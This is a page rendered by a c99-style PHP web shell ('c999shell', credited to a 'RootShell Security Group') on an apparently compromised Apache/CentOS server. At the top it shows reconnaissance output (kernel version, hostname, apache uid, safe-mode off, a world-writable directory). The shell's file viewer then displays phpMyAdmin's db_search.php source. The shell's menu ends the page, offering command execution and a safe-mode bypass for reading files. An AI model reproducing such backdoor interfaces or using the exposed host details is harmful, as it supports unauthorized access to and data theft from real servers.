Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/phpMyAdmin/ drwxrwxrwx |
Viewing file: Select action/file-type: */ require_once('./libraries/common.lib.php'); /** * Gets some core libraries and send headers */ require('./libraries/db_details_common.inc.php'); // If config variable $cfg['Usedbsearch'] is on FALSE : exit. if (!$cfg['UseDbSearch']) { PMA_mysqlDie($strAccessDenied, '', FALSE, $err_url); } // end if $url_query .= '&goto=db_search.php'; $url_params['goto'] = 'db_search.php'; /** * Get the list of tables from the current database */ $tables = PMA_DBI_get_tables($GLOBALS['db']); $num_tables = count( $tables ); /** * Displays top links */ $sub_part = ''; require('./libraries/db_details_links.inc.php'); /** * 1. Main search form has been submitted */ if (isset($_REQUEST['submit_search'])) { /** * Builds the SQL search query * * @param string the table name * @param string the string to search * @param integer type of search (1 -> 1 word at least, 2 -> all words, * 3 -> exact string, 4 -> regexp) * * @return array 3 SQL querys (for count, display and delete results) * * @global string the url to return to in case of errors */ function PMA_getSearchSqls($table, $search_str, $search_option) { global $err_url, $charset_connection; // Statement types $sqlstr_select = 'SELECT'; $sqlstr_delete = 'DELETE'; // Fields to select $res = PMA_DBI_query('SHOW ' . (PMA_MYSQL_INT_VERSION >= 40100 ? 'FULL ' : '') . 'FIELDS FROM ' . PMA_backquote($table) . ' FROM ' . PMA_backquote($GLOBALS['db']) . ';'); while ($current = PMA_DBI_fetch_assoc($res)) { if (PMA_MYSQL_INT_VERSION >= 40100) { list($current['Charset']) = explode('_', $current['Collation']); } $current['Field'] = PMA_backquote($current['Field']); $tblfields[] = $current; } // while PMA_DBI_free_result($res); unset($current, $res); $tblfields_cnt = count($tblfields); // Table to use $sqlstr_from = ' FROM ' . PMA_backquote($GLOBALS['db']) . '.' . PMA_backquote($table); // Beginning of WHERE clause $sqlstr_where = ' WHERE'; $search_words = (($search_option > 2) ? array($search_str) : explode(' ', $search_str)); $search_wds_cnt = count($search_words); $like_or_regex = (($search_option == 4) ? 'REGEXP' : 'LIKE'); $automatic_wildcard = (($search_option <3) ? '%' : ''); for ($i = 0; $i < $search_wds_cnt; $i++) { // Eliminates empty values // In MySQL 4.1, if a field has no collation we get NULL in Charset // but in MySQL 5.0.x we get '' if (!empty($search_words[$i])) { for ($j = 0; $j < $tblfields_cnt; $j++) { if (PMA_MYSQL_INT_VERSION >= 40100 && $tblfields[$j]['Charset'] != $charset_connection && $tblfields[$j]['Charset'] != 'NULL' && $tblfields[$j]['Charset'] != '') { $prefix = 'CONVERT(_utf8 '; $suffix = ' USING ' . $tblfields[$j]['Charset'] . ') COLLATE ' . $tblfields[$j]['Collation']; } else { $prefix = $suffix = ''; } $thefieldlikevalue[] = $tblfields[$j]['Field'] . ' ' . $like_or_regex . ' ' . $prefix . '\'' . $automatic_wildcard . $search_words[$i] . $automatic_wildcard . '\'' . $suffix; } // end for $fieldslikevalues[] = ($search_wds_cnt > 1) ? '(' . implode(' OR ', $thefieldlikevalue) . ')' : implode(' OR ', $thefieldlikevalue); unset($thefieldlikevalue); } // end if } // end for $implode_str = ($search_option == 1 ? ' OR ' : ' AND '); $sqlstr_where .= ' ' . implode($implode_str, $fieldslikevalues); unset($fieldslikevalues); // Builds complete queries $sql['select_fields'] = $sqlstr_select . ' * ' . $sqlstr_from . $sqlstr_where; // here, I think we need to still use the COUNT clause, even for // VIEWs, anyway we have a WHERE clause that should limit results $sql['select_count'] = $sqlstr_select . ' COUNT(*) AS count' . $sqlstr_from . $sqlstr_where; $sql['delete'] = $sqlstr_delete . $sqlstr_from . $sqlstr_where; return $sql; } // end of the "PMA_getSearchSqls()" function /** * Displays the results */ if (!empty($_REQUEST['search_str']) && !empty($_REQUEST['search_option'])) { $original_search_str = $_REQUEST['search_str']; $search_str = PMA_sqlAddslashes($_REQUEST['search_str'], TRUE); // Get the true string to display as option's comment switch ($_REQUEST['search_option']) { case 1: $option_str = ' (' . $strSearchOption1 . ')'; $search_option = 1; break; case 2: $option_str = ' (' . $strSearchOption2 . ')'; $search_option = 2; break; case 3: $option_str = ' (' . $strSearchOption3 . ')'; $search_option = 3; break; case 4: $option_str = ' (' . $strSearchOption4 . ')'; $search_option = 4; break; } // end switch $this_url_params = array( 'db' => $GLOBALS['db'], 'goto' => 'db_details.php', 'pos' => 0, 'is_js_confirmed' => 0, ); // Displays search string echo ' ' . "\n" .'
' . sprintf($strNumSearchResultsTotal, $num_search_result_total) . ' ' . "\n"; } } // end if (!empty($search_str) && !empty($search_option)) } // end 1. /** * 2. Displays the main search form */ echo "\n"; $searched = (isset($original_search_str)) ? htmlspecialchars($original_search_str) : ''; if (empty($search_option)) { $search_option = 1; } ?> |
:: Command execute :: | |
:: Shadow's tricks :D :: | |
Useful Commands
|
:: Preddy's tricks :D :: | |
Php Safe-Mode Bypass (Read Files)
|
--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0054 ]-- |